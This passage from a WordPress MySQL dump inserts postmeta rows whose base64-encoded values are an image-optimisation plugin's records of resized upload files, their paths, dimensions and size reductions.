wvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS1lMTQ3MTU2Njk3MzcwMC0yMjV4MTI0LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MTI0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS1lMTQ3MTU2Njk3MzcwMC0yMjV4MTI0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS1lMTQ3MTU2Njk3MzcwMC0yMjV4MTI0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjA5MSwiaWQiOjU0NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS1lMTQ3MTU2Njk3MzcwMC0xMTR4MTI0LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS1lMTQ3MTU2Njk3MzcwMC0xMTR4MTI0LmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTI0IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NoZW1vdXJzYmxhY2t3aGl0ZS1lMTQ3MTU2Njk3MzcwMC0xMTR4MTI0LmpwZyIsInJlZHVjdGlvbiI6NjAyLCJ0aW1lIjoxNDgzNTg2MDkzLCJpZCI6NTQ0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLWUxNDcxNTY2OTczNzAwLTE4MHgxMjQuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLWUxNDcxNTY2OTczNzAwLTE4MHgxMjQuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxMjQiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2hlbW91cnNibGFja3doaXRlLWUxNDcxNTY2OTczNzAwLTE4MHgxMjQuanBnIiwicmVkdWN0aW9uIjozNTgsInRpbWUiOjE0ODM1ODYwOTYsImlkIjo1NDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtZTE0NzE1NjY5NzM3MDAtMjQ3eDEyNC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtZTE0NzE1NjY5NzM3MDAtMjQ3eDEyNC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjEyNCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtZTE0NzE1NjY5NzM3MDAtMjQ3eDEyNC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYwOTgsImlkIjo1NDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtZTE0NzE1NjY5NzM3MDAtMzAweDEyNC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtZTE0NzE1NjY5NzM3MDAtMzAweDEyNC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjEyNCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jaGVtb3Vyc2JsYWNrd2hpdGUtZTE0NzE1NjY5NzM3MDAtMzAweDEyNC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYxMDAsImlkIjo1NDR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30175, 523, 'wpfc_optimisation_reduction', '2317812'); 
INSERT INTO `wp_postmeta` VALUES (30176, 523, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtQm9hdC1odWxscy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLUJvYXQtaHVsbHMuanBnIiwid2lkdGgiOjM2NDgsImhlaWdodCI6MjczNiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JlbGVhU3lzLUJvYXQtaHVsbHMuanBnIiwicmVkdWN0aW9uIjoyMzE3Nzk4LCJ0aW1lIjoxNDgzNTg2MTEyLCJpZCI6IjUyMyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtQm9hdC1odWxscy0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLUJvYXQtaHVsbHMtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5cy1Cb2F0LWh1bGxzLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MTE1LCJpZCI6NTIzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLUJvYXQtaHVsbHMtODAweDYwMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5cy1Cb2F0LWh1bGxzLTgwMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUmVsZWFTeXMtQm9hdC1odWxscy04MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjExOSwiaWQiOjUyM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5cy1Cb2F0LWh1bGxzLTc2OHg1NzYuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1NzYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtQm9hdC1odWxscy03Njh4NTc2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JlbGVhU3lzLUJvYXQtaHVsbHMtNzY4eDU3Ni5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYxMjIsImlkIjo1MjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtQm9hdC1odWxscy0xNjAweDEyMDAuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5cy1Cb2F0LWh1bGxzLTE2MDB4MTIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5cy1Cb2F0LWh1bGxzLTE2MDB4MTIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYxMjYsImlkIjo1MjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtQm9hdC1odWxscy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLUJvYXQtaHVsbHMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5cy1Cb2F0LWh1bGxzLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MTI4LCJpZCI6NTIzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLUJvYXQtaHVsbHMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5cy1Cb2F0LWh1bGxzLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUmVsZWFTeXMtQm9hdC1odWxscy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjEzMSwiaWQiOjUyM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5cy1Cb2F0LWh1bGxzLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtQm9hdC1odWxscy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JlbGVhU3lzLUJvYXQtaHVsbHMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODYxMzMsImlkIjo1MjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtQm9hdC1odWxscy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLUJvYXQtaHVsbHMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5cy1Cb2F0LWh1bGxzLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MTM2LCJpZCI6NTIzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtQm9hdC1odWxscy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLUJvYXQtaHVsbHMtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5cy1Cb2F0LWh1bGxzLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MTM5LCJpZCI6NTIzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtQm9hdC1odWxscy0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLUJvYXQtaHVsbHMtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5cy1Cb2F0LWh1bGxzLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MTQxLCJpZCI6NTIzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtQm9hdC1odWxscy0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLUJvYXQtaHVsbHMtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5cy1Cb2F0LWh1bGxzLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MTQ0LCJpZCI6NTIzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtQm9hdC1odWxscy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLUJvYXQtaHVsbHMtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5cy1Cb2F0LWh1bGxzLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MTQ2LCJpZCI6NTIzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtQm9hdC1odWxscy00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLUJvYXQtaHVsbHMtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5cy1Cb2F0LWh1bGxzLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MTQ5LCJpZCI6NTIzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtQm9hdC1odWxscy02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLUJvYXQtaHVsbHMtNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5cy1Cb2F0LWh1bGxzLTYwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2MTUyLCJpZCI6NTIzfV0='); 
INSERT INTO `wp_postmeta` VALUES (30177, 517, 'wpfc_optimisation_reduction', '18576'); 
INSERT INTO `wp_postmeta` VALUES (30178, 517, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTE1NTkxNS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxNTU5MTUuanBnIiwid2lkdGgiOjQ1MDAsImhlaWdodCI6MzAwMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4NjE1NywiaWQiOiI1MTcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxNTU5MTUtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTU1OTE1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTE1NTkxNS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NjU5LCJ0aW1lIjoxNDgzNTg2MTYwLCJpZCI6NTE3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxNTU5MTUtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTU1OTE1LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTE1NTkxNS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTY5MiwidGltZSI6MTQ4MzU4NjE2NCwiaWQiOjUxN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTU1OTE1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTE1NTkxNS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxNTU5MTUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE0NjksInRpbWUiOjE0ODM1ODYxNjgsImlkIjo1MTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTE1NTkxNS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTU1OTE1LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTU1OTE1LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjgyOTIsInRpbWUiOjE0ODM1ODYxNzIsImlkIjo1MTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwOTE1NTkxNS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDkxNTU5MTUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA5MTU1OTE1LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NDgsInRpbWUiOjE0ODM1ODYxNzUsImlkIjo1MTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aX